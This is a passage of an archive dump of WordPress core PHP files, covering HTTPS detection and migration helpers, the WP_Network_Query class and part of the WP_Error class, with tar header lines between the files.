function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
class.wp-scripts-20260605024202.php 0000666 00000000527 15224151220 0012052 0 ustar 00 <?php
/**
* Dependencies API: WP_Scripts class
*
* This file is deprecated, use 'wp-includes/class-wp-scripts.php' instead.
*
* @deprecated 6.1.0
* @package WordPress
*/
_deprecated_file( basename( __FILE__ ), '6.1.0', WPINC . '/class-wp-scripts.php' );
/** WP_Scripts class */
require_once ABSPATH . WPINC . '/class-wp-scripts.php';
https-detection-20260608081111-20260621191833.php 0000666 00000013341 15224151220 0013345 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-migration-20260605080448-20260621191819.php 0000666 00000011205 15224151220 0013372 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
class-wp-network-query.php 0000666 00000046657 15224151220 0011660 0 ustar 00 <?php
/**
* Network API: WP_Network_Query class
*
* @package WordPress
* @subpackage Multisite
* @since 4.6.0
*/
/**
* Core class used for querying networks.
*
* @since 4.6.0
*
* @see WP_Network_Query::__construct() for accepted arguments.
*/
#[AllowDynamicProperties]
class WP_Network_Query {
/**
* SQL for database query.
*
* @since 4.6.0
* @var string
*/
public $request;
/**
* SQL query clauses.
*
* @since 4.6.0
* @var array
*/
protected $sql_clauses = array(
'select' => '',
'from' => '',
'where' => array(),
'groupby' => '',
'orderby' => '',
'limits' => '',
);
/**
* Query vars set by the user.
*
* @since 4.6.0
* @var array
*/
public $query_vars;
/**
* Default values for query vars.
*
* @since 4.6.0
* @var array
*/
public $query_var_defaults;
/**
* List of networks located by the query.
*
* @since 4.6.0
* @var array
*/
public $networks;
/**
* The amount of found networks for the current query.
*
* @since 4.6.0
* @var int
*/
public $found_networks = 0;
/**
* The number of pages.
*
* @since 4.6.0
* @var int
*/
public $max_num_pages = 0;
/**
* Constructor.
*
* Sets up the network query, based on the query vars passed.
*
* @since 4.6.0
*
* @param string|array $query {
* Optional. Array or query string of network query parameters. Default empty.
*
* @type int[] $network__in Array of network IDs to include. Default empty.
* @type int[] $network__not_in Array of network IDs to exclude. Default empty.
* @type bool $count Whether to return a network count (true) or array of network objects.
* Default false.
* @type string $fields Network fields to return. Accepts 'ids' (returns an array of network IDs)
* or empty (returns an array of complete network objects). Default empty.
* @type int $number Maximum number of networks to retrieve. Default empty (no limit).
* @type int $offset Number of networks to offset the query. Used to build LIMIT clause.
* Default 0.
* @type bool $no_found_rows Whether to disable the `SQL_CALC_FOUND_ROWS` query. Default true.
* @type string|array $orderby Network status or array of statuses. Accepts 'id', 'domain', 'path',
* 'domain_length', 'path_length' and 'network__in'. Also accepts false,
* an empty array, or 'none' to disable `ORDER BY` clause. Default 'id'.
* @type string $order How to order retrieved networks. Accepts 'ASC', 'DESC'. Default 'ASC'.
* @type string $domain Limit results to those affiliated with a given domain. Default empty.
* @type string[] $domain__in Array of domains to include affiliated networks for. Default empty.
* @type string[] $domain__not_in Array of domains to exclude affiliated networks for. Default empty.
* @type string $path Limit results to those affiliated with a given path. Default empty.
* @type string[] $path__in Array of paths to include affiliated networks for. Default empty.
* @type string[] $path__not_in Array of paths to exclude affiliated networks for. Default empty.
* @type string $search Search term(s) to retrieve matching networks for. Default empty.
* @type bool $update_network_cache Whether to prime the cache for found networks. Default true.
* }
*/
public function __construct( $query = '' ) {
$this->query_var_defaults = array(
'network__in' => '',
'network__not_in' => '',
'count' => false,
'fields' => '',
'number' => '',
'offset' => '',
'no_found_rows' => true,
'orderby' => 'id',
'order' => 'ASC',
'domain' => '',
'domain__in' => '',
'domain__not_in' => '',
'path' => '',
'path__in' => '',
'path__not_in' => '',
'search' => '',
'update_network_cache' => true,
);
if ( ! empty( $query ) ) {
$this->query( $query );
}
}
/**
* Parses arguments passed to the network query with default query parameters.
*
* @since 4.6.0
*
* @param string|array $query WP_Network_Query arguments. See WP_Network_Query::__construct() for accepted arguments.
*/
public function parse_query( $query = '' ) {
if ( empty( $query ) ) {
$query = $this->query_vars;
}
$this->query_vars = wp_parse_args( $query, $this->query_var_defaults );
/**
* Fires after the network query vars have been parsed.
*
* @since 4.6.0
*
* @param WP_Network_Query $query The WP_Network_Query instance (passed by reference).
*/
do_action_ref_array( 'parse_network_query', array( &$this ) );
}
/**
* Sets up the WordPress query for retrieving networks.
*
* @since 4.6.0
*
* @param string|array $query Array or URL query string of parameters.
* @return array|int List of WP_Network objects, a list of network IDs when 'fields' is set to 'ids',
* or the number of networks when 'count' is passed as a query var.
*/
public function query( $query ) {
$this->query_vars = wp_parse_args( $query );
return $this->get_networks();
}
/**
* Gets a list of networks matching the query vars.
*
* @since 4.6.0
*
* @return array|int List of WP_Network objects, a list of network IDs when 'fields' is set to 'ids',
* or the number of networks when 'count' is passed as a query var.
*/
public function get_networks() {
$this->parse_query();
/**
* Fires before networks are retrieved.
*
* @since 4.6.0
*
* @param WP_Network_Query $query Current instance of WP_Network_Query (passed by reference).
*/
do_action_ref_array( 'pre_get_networks', array( &$this ) );
$network_data = null;
/**
* Filters the network data before the query takes place.
*
* Return a non-null value to bypass WordPress' default network queries.
*
* The expected return type from this filter depends on the value passed
* in the request query vars:
* - When `$this->query_vars['count']` is set, the filter should return
* the network count as an integer.
* - When `'ids' === $this->query_vars['fields']`, the filter should return
* an array of network IDs.
* - Otherwise the filter should return an array of WP_Network objects.
*
* Note that if the filter returns an array of network data, it will be assigned
* to the `networks` property of the current WP_Network_Query instance.
*
* Filtering functions that require pagination information are encouraged to set
* the `found_networks` and `max_num_pages` properties of the WP_Network_Query object,
* passed to the filter by reference. If WP_Network_Query does not perform a database
* query, it will not have enough information to generate these values itself.
*
* @since 5.2.0
* @since 5.6.0 The returned array of network data is assigned to the `networks` property
* of the current WP_Network_Query instance.
*
* @param array|int|null $network_data Return an array of network data to short-circuit WP's network query,
* the network count as an integer if `$this->query_vars['count']` is set,
* or null to allow WP to run its normal queries.
* @param WP_Network_Query $query The WP_Network_Query instance, passed by reference.
*/
$network_data = apply_filters_ref_array( 'networks_pre_query', array( $network_data, &$this ) );
if ( null !== $network_data ) {
if ( is_array( $network_data ) && ! $this->query_vars['count'] ) {
$this->networks = $network_data;
}
return $network_data;
}
// $args can include anything. Only use the args defined in the query_var_defaults to compute the key.
$_args = wp_array_slice_assoc( $this->query_vars, array_keys( $this->query_var_defaults ) );
// Ignore the $fields, $update_network_cache arguments as the queried result will be the same regardless.
unset( $_args['fields'], $_args['update_network_cache'] );
$key = md5( serialize( $_args ) );
$last_changed = wp_cache_get_last_changed( 'networks' );
$cache_key = "get_network_ids:$key";
$cache_value = wp_cache_get_salted( $cache_key, 'network-queries', $last_changed );
if ( false === $cache_value ) {
$network_ids = $this->get_network_ids();
if ( $network_ids ) {
$this->set_found_networks();
}
$cache_value = array(
'network_ids' => $network_ids,
'found_networks' => $this->found_networks,
);
wp_cache_set_salted( $cache_key, $cache_value, 'network-queries', $last_changed );
} else {
$network_ids = $cache_value['network_ids'];
$this->found_networks = $cache_value['found_networks'];
}
if ( $this->found_networks && $this->query_vars['number'] ) {
$this->max_num_pages = (int) ceil( $this->found_networks / $this->query_vars['number'] );
}
// If querying for a count only, there's nothing more to do.
if ( $this->query_vars['count'] ) {
// $network_ids is actually a count in this case.
return (int) $network_ids;
}
$network_ids = array_map( 'intval', $network_ids );
if ( 'ids' === $this->query_vars['fields'] ) {
$this->networks = $network_ids;
return $this->networks;
}
if ( $this->query_vars['update_network_cache'] ) {
_prime_network_caches( $network_ids );
}
// Fetch full network objects from the primed cache.
$_networks = array();
foreach ( $network_ids as $network_id ) {
$_network = get_network( $network_id );
if ( $_network ) {
$_networks[] = $_network;
}
}
/**
* Filters the network query results.
*
* @since 4.6.0
*
* @param WP_Network[] $_networks An array of WP_Network objects.
* @param WP_Network_Query $query Current instance of WP_Network_Query (passed by reference).
*/
$_networks = apply_filters_ref_array( 'the_networks', array( $_networks, &$this ) );
// Convert to WP_Network instances.
$this->networks = array_map( 'get_network', $_networks );
return $this->networks;
}
/**
* Used internally to get a list of network IDs matching the query vars.
*
* @since 4.6.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @return int|array A single count of network IDs if a count query. An array of network IDs if a full query.
*/
protected function get_network_ids() {
global $wpdb;
$order = $this->parse_order( $this->query_vars['order'] );
// Disable ORDER BY with 'none', an empty array, or boolean false.
if ( in_array( $this->query_vars['orderby'], array( 'none', array(), false ), true ) ) {
$orderby = '';
} elseif ( ! empty( $this->query_vars['orderby'] ) ) {
$ordersby = is_array( $this->query_vars['orderby'] ) ?
$this->query_vars['orderby'] :
preg_split( '/[,\s]/', $this->query_vars['orderby'] );
$orderby_array = array();
foreach ( $ordersby as $_key => $_value ) {
if ( ! $_value ) {
continue;
}
if ( is_int( $_key ) ) {
$_orderby = $_value;
$_order = $order;
} else {
$_orderby = $_key;
$_order = $_value;
}
$parsed = $this->parse_orderby( $_orderby );
if ( ! $parsed ) {
continue;
}
if ( 'network__in' === $_orderby ) {
$orderby_array[] = $parsed;
continue;
}
$orderby_array[] = $parsed . ' ' . $this->parse_order( $_order );
}
$orderby = implode( ', ', $orderby_array );
} else {
$orderby = "$wpdb->site.id $order";
}
$number = absint( $this->query_vars['number'] );
$offset = absint( $this->query_vars['offset'] );
$limits = '';
if ( ! empty( $number ) ) {
if ( $offset ) {
$limits = 'LIMIT ' . $offset . ',' . $number;
} else {
$limits = 'LIMIT ' . $number;
}
}
if ( $this->query_vars['count'] ) {
$fields = 'COUNT(*)';
} else {
$fields = "$wpdb->site.id";
}
// Parse network IDs for an IN clause.
if ( ! empty( $this->query_vars['network__in'] ) ) {
$this->sql_clauses['where']['network__in'] = "$wpdb->site.id IN ( " . implode( ',', wp_parse_id_list( $this->query_vars['network__in'] ) ) . ' )';
}
// Parse network IDs for a NOT IN clause.
if ( ! empty( $this->query_vars['network__not_in'] ) ) {
$this->sql_clauses['where']['network__not_in'] = "$wpdb->site.id NOT IN ( " . implode( ',', wp_parse_id_list( $this->query_vars['network__not_in'] ) ) . ' )';
}
if ( ! empty( $this->query_vars['domain'] ) ) {
$this->sql_clauses['where']['domain'] = $wpdb->prepare( "$wpdb->site.domain = %s", $this->query_vars['domain'] );
}
// Parse network domain for an IN clause.
if ( is_array( $this->query_vars['domain__in'] ) ) {
$this->sql_clauses['where']['domain__in'] = "$wpdb->site.domain IN ( '" . implode( "', '", $wpdb->_escape( $this->query_vars['domain__in'] ) ) . "' )";
}
// Parse network domain for a NOT IN clause.
if ( is_array( $this->query_vars['domain__not_in'] ) ) {
$this->sql_clauses['where']['domain__not_in'] = "$wpdb->site.domain NOT IN ( '" . implode( "', '", $wpdb->_escape( $this->query_vars['domain__not_in'] ) ) . "' )";
}
if ( ! empty( $this->query_vars['path'] ) ) {
$this->sql_clauses['where']['path'] = $wpdb->prepare( "$wpdb->site.path = %s", $this->query_vars['path'] );
}
// Parse network path for an IN clause.
if ( is_array( $this->query_vars['path__in'] ) ) {
$this->sql_clauses['where']['path__in'] = "$wpdb->site.path IN ( '" . implode( "', '", $wpdb->_escape( $this->query_vars['path__in'] ) ) . "' )";
}
// Parse network path for a NOT IN clause.
if ( is_array( $this->query_vars['path__not_in'] ) ) {
$this->sql_clauses['where']['path__not_in'] = "$wpdb->site.path NOT IN ( '" . implode( "', '", $wpdb->_escape( $this->query_vars['path__not_in'] ) ) . "' )";
}
// Falsey search strings are ignored.
if ( strlen( $this->query_vars['search'] ) ) {
$this->sql_clauses['where']['search'] = $this->get_search_sql(
$this->query_vars['search'],
array( "$wpdb->site.domain", "$wpdb->site.path" )
);
}
$join = '';
$where = implode( ' AND ', $this->sql_clauses['where'] );
$groupby = '';
$pieces = array( 'fields', 'join', 'where', 'orderby', 'limits', 'groupby' );
/**
* Filters the network query clauses.
*
* @since 4.6.0
*
* @param string[] $clauses {
* Associative array of the clauses for the query.
*
* @type string $fields The SELECT clause of the query.
* @type string $join The JOIN clause of the query.
* @type string $where The WHERE clause of the query.
* @type string $orderby The ORDER BY clause of the query.
* @type string $limits The LIMIT clause of the query.
* @type string $groupby The GROUP BY clause of the query.
* }
* @param WP_Network_Query $query Current instance of WP_Network_Query (passed by reference).
*/
$clauses = apply_filters_ref_array( 'networks_clauses', array( compact( $pieces ), &$this ) );
$fields = isset( $clauses['fields'] ) ? $clauses['fields'] : '';
$join = isset( $clauses['join'] ) ? $clauses['join'] : '';
$where = isset( $clauses['where'] ) ? $clauses['where'] : '';
$orderby = isset( $clauses['orderby'] ) ? $clauses['orderby'] : '';
$limits = isset( $clauses['limits'] ) ? $clauses['limits'] : '';
$groupby = isset( $clauses['groupby'] ) ? $clauses['groupby'] : '';
if ( $where ) {
$where = 'WHERE ' . $where;
}
if ( $groupby ) {
$groupby = 'GROUP BY ' . $groupby;
}
if ( $orderby ) {
$orderby = "ORDER BY $orderby";
}
$found_rows = '';
if ( ! $this->query_vars['no_found_rows'] ) {
$found_rows = 'SQL_CALC_FOUND_ROWS';
}
$this->sql_clauses['select'] = "SELECT $found_rows $fields";
$this->sql_clauses['from'] = "FROM $wpdb->site $join";
$this->sql_clauses['groupby'] = $groupby;
$this->sql_clauses['orderby'] = $orderby;
$this->sql_clauses['limits'] = $limits;
// Beginning of the string is on a new line to prevent leading whitespace. See https://core.trac.wordpress.org/ticket/56841.
$this->request =
"{$this->sql_clauses['select']}
{$this->sql_clauses['from']}
{$where}
{$this->sql_clauses['groupby']}
{$this->sql_clauses['orderby']}
{$this->sql_clauses['limits']}";
if ( $this->query_vars['count'] ) {
return (int) $wpdb->get_var( $this->request );
}
$network_ids = $wpdb->get_col( $this->request );
return array_map( 'intval', $network_ids );
}
/**
* Populates found_networks and max_num_pages properties for the current query
* if the limit clause was used.
*
* @since 4.6.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*/
private function set_found_networks() {
global $wpdb;
if ( $this->query_vars['number'] && ! $this->query_vars['no_found_rows'] ) {
/**
* Filters the query used to retrieve found network count.
*
* @since 4.6.0
*
* @param string $found_networks_query SQL query. Default 'SELECT FOUND_ROWS()'.
* @param WP_Network_Query $network_query The `WP_Network_Query` instance.
*/
$found_networks_query = apply_filters( 'found_networks_query', 'SELECT FOUND_ROWS()', $this );
$this->found_networks = (int) $wpdb->get_var( $found_networks_query );
}
}
/**
* Used internally to generate an SQL string for searching across multiple columns.
*
* @since 4.6.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $search Search string.
* @param string[] $columns Array of columns to search.
* @return string Search SQL.
*/
protected function get_search_sql( $search, $columns ) {
global $wpdb;
$like = '%' . $wpdb->esc_like( $search ) . '%';
$searches = array();
foreach ( $columns as $column ) {
$searches[] = $wpdb->prepare( "$column LIKE %s", $like );
}
return '(' . implode( ' OR ', $searches ) . ')';
}
/**
* Parses and sanitizes 'orderby' keys passed to the network query.
*
* @since 4.6.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $orderby Alias for the field to order by.
* @return string|false Value to used in the ORDER clause. False otherwise.
*/
protected function parse_orderby( $orderby ) {
global $wpdb;
$allowed_keys = array(
'id',
'domain',
'path',
);
$parsed = false;
if ( 'network__in' === $orderby ) {
$network__in = implode( ',', array_map( 'absint', $this->query_vars['network__in'] ) );
$parsed = "FIELD( {$wpdb->site}.id, $network__in )";
} elseif ( 'domain_length' === $orderby || 'path_length' === $orderby ) {
$field = substr( $orderby, 0, -7 );
$parsed = "CHAR_LENGTH($wpdb->site.$field)";
} elseif ( in_array( $orderby, $allowed_keys, true ) ) {
$parsed = "$wpdb->site.$orderby";
}
return $parsed;
}
/**
* Parses an 'order' query variable and cast it to 'ASC' or 'DESC' as necessary.
*
* @since 4.6.0
*
* @param string $order The 'order' query variable.
* @return string The sanitized 'order' query variable.
*/
protected function parse_order( $order ) {
if ( ! is_string( $order ) || empty( $order ) ) {
return 'ASC';
}
if ( 'ASC' === strtoupper( $order ) ) {
return 'ASC';
} else {
return 'DESC';
}
}
}
class-wp-error-20260621094000.php 0000666 00000016516 15224151220 0011521 0 ustar 00 <?php
/**
* WordPress Error API.
*
* @package WordPress
*/
/**
* WordPress Error class.
*
* Container for checking for WordPress errors and error messages. Return
* WP_Error and use is_wp_error() to check if this class is returned. Many
* core WordPress functions pass this class in the event of an error and
* if not handled properly will result in code errors.
*
* @since 2.1.0
*/
#[AllowDynamicProperties]
class WP_Error {
/**
* Stores the list of errors.
*
* @since 2.1.0
* @var array
*/
public $errors = array();
/**
* Stores the most recently added data for each error code.
*
* @since 2.1.0
* @var array
*/
public $error_data = array();
/**
* Stores previously added data added for error codes, oldest-to-newest by code.
*
* @since 5.6.0
* @var array[]
*/
protected $additional_data = array();
/**
* Initializes the error.
*
* If `$code` is empty, the other parameters will be ignored.
* When `$code` is not empty, `$message` will be used even if
* it is empty. The `$data` parameter will be used only if it
* is not empty.
*
* Though the class is constructed with a single error code and
* message, multiple codes can be added using the `add()` method.
*
* @since 2.1.0
*
* @param string|int $code Error code.
* @param string $message Error message.
* @param mixed $data Optional. Error data. Default empty string.
*/
public function __construct( $code = '', $message = '', $data = '' ) {
if ( empty( $code ) ) {
return;
}
$this->add( $code, $message, $data );
}
/**
* Retrieves all error codes.
*
* @since 2.1.0
*
* @return array List of error codes, if available.
*/
public function get_error_codes() {
if ( ! $this->has_errors() ) {
return array();
}
return array_keys( $this->errors );
}
/**
* Retrieves the first error code available.
*
* @since 2.1.0
*
* @return string|int Empty string, if no error codes.
*/
public function get_error_code() {
$codes = $this->get_error_codes();
if ( empty( $codes ) ) {
return '';
}
return $codes[0];
}
/**
* Retrieves all error messages, or the error messages for the given error code.
*
* @since 2.1.0
*
* @param string|int $code Optional. Error code to retrieve the messages for.
* Default empty string.
* @return string[] Error strings on success, or empty array if there are none.
*/
public function get_error_messages( $code = '' ) {
// Return all messages if no code specified.
if ( empty( $code ) ) {
$all_messages = array();
foreach ( (array) $this->errors as $code => $messages ) {
$all_messages = array_merge( $all_messages, $messages );
}
return $all_messages;
}
if ( isset( $this->errors[ $code ] ) ) {
return $this->errors[ $code ];
} else {
return array();
}
}
/**
* Gets a single error message.
*
* This will get the first message available for the code. If no code is
* given then the first code available will be used.
*
* @since 2.1.0
*
* @param string|int $code Optional. Error code to retrieve the message for.
* Default empty string.
* @return string The error message.
*/
public function get_error_message( $code = '' ) {
if ( empty( $code ) ) {
$code = $this->get_error_code();
}
$messages = $this->get_error_messages( $code );
if ( empty( $messages ) ) {
return '';
}
return $messages[0];
}
/**
* Retrieves the most recently added error data for an error code.
*
* @since 2.1.0
*
* @param string|int $code Optional. Error code. Default empty string.
* @return mixed Error data, if it exists.
*/
public function get_error_data( $code = '' ) {
